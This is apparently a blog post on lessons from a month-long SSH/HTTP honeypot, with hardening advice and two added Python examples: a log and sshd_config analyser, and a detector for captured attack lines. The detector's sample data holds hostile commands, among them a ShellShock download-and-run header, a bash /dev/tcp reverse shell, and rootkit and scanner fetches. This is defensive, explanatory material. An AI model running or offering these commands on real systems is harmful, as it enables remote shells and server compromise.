So… I’ve been running my ssh/http honeypot for almost a month now. While
I’m not really ready to release all my reports to the intar-webs yet,
there are some lessons that are readily apparent. And sadly, these
are the same lessons everyone else has been screaming about for the
last dozen years.
- Don’t allow root to ssh into your server. Make sure your
/etc/ssh/sshd_config has “PermitRootLogin no” set, and restart
sshd so the change actually takes effect.
- Don’t use stupid passwords. Passwords like “password”,
“admin”, and “123456” and their assorted variations are the
top passwords that ssh brute force attacks try.
- Longer passwords are better than shorter passwords. Well over
95% of the passwords tried are 8 characters or fewer.
- Don’t keep the default passwords for any software you install.
Searching Google for the passwords tried shows that many of them
are the default passwords for one piece of software or another.
- Don’t keep the default passwords for any hardware (including
routers). They keep trying “admin” accounts with the password
“admin” which was a default for older home routers.
- Patch bash! They keep trying ShellShock attacks against my
honeypot, so they must be succeeding enough of the time to make
it worth their while.
- Patch PHP! The second most common attack is against old PHP.
- Don’t install things into their default directories on the
webserver. Most attacks are against default scripts that get
put into the cgi-bin directory. Even renaming cgi-bin to CGI-BIN
and changing your httpd.conf file to reflect that change eliminates
more than 95% of the attacks, because the scanners request the
exact lowercase path. Close after that are phpMyAdmin, webtools,
ccbill, cgibin (no dash), and /mail. Rename those directories and
even if you’re vulnerable, they probably won’t find you quickly.
That buys you time, not safety, so patch as well.
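To put numbers on the lessons above, here is an added Python example (not the post’s own honeypot code or reports) that runs the same three checks over constructed data: which passwords and default credentials show up in SSH attempts, what share of web requests hit the default directories named above, and what sshd will actually do with a PermitRootLogin line. The SSH log layout, the default-credential table, the request paths and the sshd_config excerpt are all made up for illustration; the sshd parsing assumes no Match blocks.

```python
"""Check the lessons above against honeypot data.

Added example, not the original post's code or honeypot. All log lines,
the default-credential table and the sshd_config excerpt are constructed;
the SSH log layout "<ts> <src> <user> <password>" is an assumption.
"""
from collections import Counter

# Constructed SSH brute-force attempts, one per line.
SSH_ATTEMPTS = """\
2014-10-01T03:12:01 198.51.100.7 root 123456
2014-10-01T03:12:02 198.51.100.7 root password
2014-10-01T03:12:03 198.51.100.7 root admin
2014-10-01T03:12:04 198.51.100.7 admin admin
2014-10-01T03:12:05 203.0.113.9 root root
2014-10-01T03:12:06 203.0.113.9 root 12345678
2014-10-01T03:12:07 203.0.113.9 oracle oracle
2014-10-01T03:12:08 203.0.113.9 root Passw0rd!2014
2014-10-01T03:12:09 192.0.2.44 pi raspberry
2014-10-01T03:12:10 192.0.2.44 root admin123
"""

# Constructed default-credential table: (user, password) -> where it comes from.
DEFAULT_CREDS = {
    ("admin", "admin"): "common home-router default",
    ("pi", "raspberry"): "Raspbian default account",
    ("oracle", "oracle"): "frequently left on Oracle DB hosts",
}

def parse_ssh(text):
    """Yield (user, password) from the constructed log layout."""
    for line in text.splitlines():
        parts = line.split(" ", 3)
        if len(parts) == 4:
            yield parts[2], parts[3]

def ssh_summary(text=SSH_ATTEMPTS, top=5):
    """Top passwords, share of short passwords, share aimed at root,
    and which attempts are straight default credentials."""
    attempts = list(parse_ssh(text))
    n = len(attempts)
    return {
        "attempts": n,
        "top_passwords": Counter(pw for _, pw in attempts).most_common(top),
        "pct_short": 100.0 * sum(len(pw) <= 8 for _, pw in attempts) / n,
        "pct_root": 100.0 * sum(u == "root" for u, _ in attempts) / n,
        "default_cred_hits": [(u, p, DEFAULT_CREDS[(u, p)])
                              for u, p in attempts if (u, p) in DEFAULT_CREDS],
    }

# Constructed web-honeypot request paths and the default directories the
# post names.  Matching is case-sensitive on purpose: a request for
# /cgi-bin/php does not reach a script installed under /CGI-BIN/.
HTTP_PATHS = [
    "/cgi-bin/php", "/cgi-bin/test-cgi", "/cgi-bin/php5", "/cgi-bin/php-cgi",
    "/cgi-bin/bash", "/phpMyAdmin/scripts/setup.php", "/webtools/",
    "/ccbill/whereami.cgi", "/cgibin/php", "/mail/", "/index.html", "/robots.txt",
]
DEFAULT_DIRS = ("/cgi-bin/", "/phpMyAdmin/", "/webtools/", "/ccbill/", "/cgibin/", "/mail/")

def default_dir_share(paths=HTTP_PATHS):
    """Hits per default directory and the percentage of requests that
    would miss entirely if those directories were renamed."""
    by_dir = Counter()
    for p in paths:
        for d in DEFAULT_DIRS:
            if p.startswith(d):
                by_dir[d] += 1
                break
    return by_dir, round(100.0 * sum(by_dir.values()) / len(paths), 2)

# Constructed sshd_config excerpt.  sshd takes the FIRST value it sees for
# a keyword, so the later "PermitRootLogin yes" is ignored, and the
# commented line only documents the default; it sets nothing.
SSHD_CONFIG = """\
#PermitRootLogin yes
PermitRootLogin no
PasswordAuthentication yes
PermitRootLogin yes
"""

def sshd_effective(config_text=SSHD_CONFIG, keyword="PermitRootLogin"):
    """Resolve a keyword the way sshd does (first match wins, keywords are
    case-insensitive).  Match blocks are assumed absent; they are not modelled."""
    for line in config_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.replace("=", " ", 1).split(None, 1)
        if len(parts) == 2 and parts[0].lower() == keyword.lower():
            return parts[1].strip()
    return None

if __name__ == "__main__":
    print(ssh_summary())
    print(default_dir_share())
    print("PermitRootLogin ->", sshd_effective())
```

The sshd check is the one people get wrong: appending “PermitRootLogin no” to the end of a file that already sets it to “yes” higher up changes nothing, because sshd keeps the first value. Run `sshd -T | grep -i permitrootlogin` on the real host to see the effective setting.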
What are they trying to run?
- Number one thing they are trying to run is the Atrix IRC worm.
This is an IRC bot that lets them use your server to attack other
servers, AND can give them the ability to run commands on your
server as whatever UID httpd is running as.
- bash. Yes, bash. Bash can open a TCP connection all by itself
through its /dev/tcp pseudo-device, no netcat or other tool needed.
Once they have command execution, a one-liner wires a bash shell on
your server to a port they chose, and they can run whatever they
want to.
- ssh brute force scripts. These try to login to other servers
and then report the successful attempts back to another server.
- ONE instance of a rootkit. Why? I have no idea. I assume
the other attacks are precursors to downloading and running a
rootkit on your server.
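The payloads above leave recognisable traces in whatever a honeypot (or a real server’s logs) captures. As an added example, not part of the original post and not its honeypot’s code, here is a small Python rule set that tags captured lines for the ShellShock header marker, a bash /dev/tcp shell, and a download-then-execute chain of the kind an IRC bot or brute-force kit drop uses. The captured lines and the rules are constructed; the URLs and file names in them are placeholders.

```python
"""Tag what attackers try to run, from honeypot-captured lines.

Added example, not the original post's code or honeypot. The captures
below are constructed (documentation IP ranges, made-up file names) and
the rule set is an assumption seeded by the post's observations.
"""
import re

# Constructed captures: a ShellShock payload arrives in an HTTP header;
# the rest are commands executed through the shell it yields.
CAPTURES = [
    'User-Agent: () { :;}; /bin/bash -c "cd /tmp; wget http://198.51.100.7/bot.pl; perl bot.pl"',
    "bash -i >& /dev/tcp/203.0.113.9/4444 0>&1",
    "curl -s http://192.0.2.44/sshscan.tgz | tar xz; cd sshscan; ./go.sh",
    "cd /tmp; wget http://198.51.100.7/rk.tar; tar xf rk.tar; ./install",
    "uname -a; id; cat /etc/passwd",
]

RULES = [
    # The function-definition prefix that triggers the ShellShock bug.
    ("shellshock", re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")),
    # Bash's built-in /dev/tcp (or /dev/udp) redirection: host then port.
    ("bash_tcp_shell", re.compile(r"/dev/(tcp|udp)/[\w.:-]+/\d+")),
    # Fetch something, then hand it to an interpreter, unpacker or executor.
    ("download_and_run", re.compile(
        r"\b(wget|curl)\b.*?(\||;|&&)\s*(sh|bash|perl|python|tar|chmod|\./)\b")),
]

def tag_line(line):
    """Names of every rule that fires on one captured line."""
    return [name for name, rx in RULES if rx.search(line)]

def tag_all(lines=CAPTURES):
    """(index, tags) for each line; an empty tag list means no rule fired."""
    return [(i, tag_line(line)) for i, line in enumerate(lines)]

if __name__ == "__main__":
    for i, tags in tag_all():
        print(i, tags or "-", CAPTURES[i][:60])
```

The last capture (plain reconnaissance) gets no tag, which is the point of keeping the rules narrow: a rule that fires on `id` or `uname` would drown the interesting hits. Feed the same functions your web server’s access log and the shell history of a compromised box and the `download_and_run` rule alone will usually surface the bot drop.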